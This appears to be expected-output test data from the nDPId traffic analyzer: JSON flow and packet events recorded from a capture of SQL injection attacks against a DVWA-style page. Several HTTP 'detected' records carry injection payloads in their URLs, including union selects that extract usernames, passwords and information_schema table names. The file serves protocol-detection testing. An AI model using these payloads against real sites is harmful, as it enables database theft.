00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"}
01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"}
00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"}
01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"}
01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"}
01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348407419,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348407419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"}
00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="}
